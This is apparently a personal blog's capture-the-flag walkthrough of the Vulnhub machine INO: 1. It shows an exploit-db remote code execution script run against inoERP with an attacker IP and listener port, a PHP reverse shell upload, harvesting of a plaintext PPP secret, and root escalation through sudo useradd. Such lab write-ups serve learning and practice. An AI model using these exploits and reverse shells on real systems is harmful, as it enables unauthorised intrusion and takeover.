---
layout: post
title:  "Vulnhub - INO: 1"
date:   2020-12-05 16:00:00 +1100
category: hacking
---

## Introduction
*Level: Easy  
flags: user, root  
Description: This machine require a low skill to get user flag, a little more skill to escalate to root!  
Author: foxlox*

This is [INO: 1](https://www.vulnhub.com/entry/ino-1,601/) from Vulnhub.

## Ports
SSH, SMTP (25) and HTTP.

## HTTP
Well, this webserver hated me. Because it's running *fail2ban*. Basically it was one run with gobuster or whatever, and then good luck getting it to respond again. Anyway, that was part of the fun I guess :)

The simplest way to a shell here is via */lot/*, which is easily found and [easily exploited](https://packetstormsecurity.com/files/159764/lrms10-sql.txt). The exploit doesn't say what you can do with it, but I uploaded the pentestmonkey PHP reverse shell with the *Division List* option in the GUI. It was quite happy to take and execute a PHP file, no issues. Yikes.

### A quick aside
Google has been flagging the pentestmonkey site as scary and dangerous for a while now, but Chrome flat out refused to download the shell I wanted - there is literally no (obvious) option to tell it that, yes I really do want to download this file. Nope; Google says it's spooky and you can't have it. 

This wouldn't have been an issue, except I was working through my Windows host machine rather than Kali, since I'd upset *fail2ban* on Kali. So I downloaded the file with *wget* in WSL. Windows Defender promptly nuked it anyway, but at least I had the option to restore it from Defender jail and the nuking didn't come as a surprise. But Chrome too? Geez.

### Back on track
Actually once I'm on the box there is a second web-based option to get a reverse shell. The box is running [inoERP](https://github.com/inoerp/inoERP/tree/master/inoerp) in addition to the [Lot](https://www.sourcecodester.com/php/14530/lot-reservation-management-system-using-phpmysqli-source-code.html) Reservation Management System. And, inoERP is also exploitable with a python script on searchsploit:

{% highlight shell %}
root@kali:/opt/vulnhub/ino# searchsploit -m php/webapps/48946.py
  Exploit: InoERP 0.7.2 - Remote Code Execution (Unauthenticated)
      URL: https://www.exploit-db.com/exploits/48946
     Path: /usr/share/exploitdb/exploits/php/webapps/48946.py
File Type: Python script, ASCII text executable, with CRLF line terminators

Copied to: /opt/vulnhub/ino/48946.py


root@kali:/opt/vulnhub/ino# chmod +x 48946.py 
root@kali:/opt/vulnhub/ino# python 48946.py 
specify params in format: python inoerp.py target_url attacker_ip listening_port
root@kali:/opt/vulnhub/ino# python 48946.py http://192.168.1.155/ino_enterprise_resource_planning/www/ 192.168.1.150 1235
{% endhighlight %}

The only hard part with that would be knowing that the directory exists - *ino_enterprise_resource_planning* is a heck of a subdirectory name to guess. I haven't checked if it's in any of my wordlists but I can't see why it would be.

## On the box
We can find some MySQL creds (lot:lot) and extract a bunch of hashes, many of which we can crack to simple things like *admin*, *admin123* etc. But none of this is useful. I run LinPeas; nothing very useful. We have one obvious target user - *ppp*. I had to enumerate the box for quite a while before I eventually found the user password; here's my thinking.

I could see that the box was being worked on during late October - particularly October 27 in the afternoon. I knew I wanted the user *ppp*. I ran this command:

``
www-data@ino:/$ find . -ls 2>/dev/null | grep 'Oct 27 18' | cat 2>/dev/null | grep ppp
``

Which turned up this, amongst some other things:

>132449      8 -rw-r--r--   1 root             root                 4141 Oct 27 18:47 ./var/lib/dpkg/info/ppp.list

I looked in that file, and found there was an */etc/ppp* directory, which I hadn't previously noticed. In there, I found the pot of gold:

{% highlight shell %}
<rce_planning/www/modules/sys/form_personalization$ cd /etc/ppp
cd /etc/ppp
www-data@ino:/etc/ppp$ ls -lash
ls -lash
total 68K
4.0K drwxr-xr-x  7 root dip  4.0K Oct 26 16:26 .
4.0K drwxr-xr-x 96 root root 4.0K Dec  5 01:32 ..
4.0K -rw-r--r--  1 root root  101 Oct 26 16:26 chap-secrets
4.0K -rwxr-xr-x  1 root root 1.8K Feb 20  2020 ip-down
4.0K drwxr-xr-x  2 root root 4.0K Oct 26 16:24 ip-down.d
4.0K -rwxr-xr-x  1 root root 1.9K Feb 20  2020 ip-up
4.0K drwxr-xr-x  2 root root 4.0K Oct 26 16:40 ip-up.d
4.0K -rwxr-xr-x  1 root root  784 Feb 20  2020 ipv6-down
4.0K drwxr-xr-x  2 root root 4.0K Feb 20  2020 ipv6-down.d
4.0K -rwxr-xr-x  1 root root  922 Feb 20  2020 ipv6-up
4.0K drwxr-xr-x  2 root root 4.0K Feb 20  2020 ipv6-up.d
 16K -rw-r--r--  1 root root  13K Feb 20  2020 options
4.0K -rw-------  1 root root 1.6K Oct 26 16:24 pap-secrets
4.0K drwxr-s---  2 root dip  4.0K Oct 26 16:24 peers
www-data@ino:/etc/ppp$ file chap
file chap-secrets 
chap-secrets: ASCII text
www-data@ino:/etc/ppp$ cat ch
cat chap-secrets 
# Secrets for authentication using CHAP
# client        server  secret                  IP addresses
ppp     *       ESRxd7856HVJB   *
{% endhighlight %}

So yes, now we have the password for *ppp*. 

## Privesc
*ppp* can run useradd as root. I had to check the manpages, but when we add a user we can add them to a group, and specify their password (as returned by crypt) if we want. So the method I used was to add a user called *rootpls* with the password *mrcake* to the sudo group. Then since he was in the sudo group, I could do **sudo su** to become root. Let's see this in action:

{% highlight shell %}
www-data@ino:/$ su ppp
su ppp
Password: ESRxd7856HVJB

ppp@ino:/$ sudo -l
sudo -l
Matching Defaults entries for ppp on ino:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User ppp may run the following commands on ino:
    (root) NOPASSWD: /usr/sbin/useradd *
ppp@ino:/$ 

ppp@ino:/$ sudo -u root /usr/sbin/useradd -g sudo -p WVLY0mgH0RtUI rootpls
sudo -u root /usr/sbin/useradd -g sudo -p WVLY0mgH0RtUI rootpls
ppp@ino:/$ su rootpls
su rootpls
Password: mrcake
$ id
id
uid=1003(rootpls) gid=27(sudo) groups=27(sudo)
$ sudo su
sudo su

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for rootpls: mrcake

root@ino:/# 
root@ino:~# cat proof.txt
cat proof.txt
21bae0a12690199cde7a65bff57723a5
{% endhighlight %}

Not going to lie, I did a little happy dance once I'd rooted this one :)
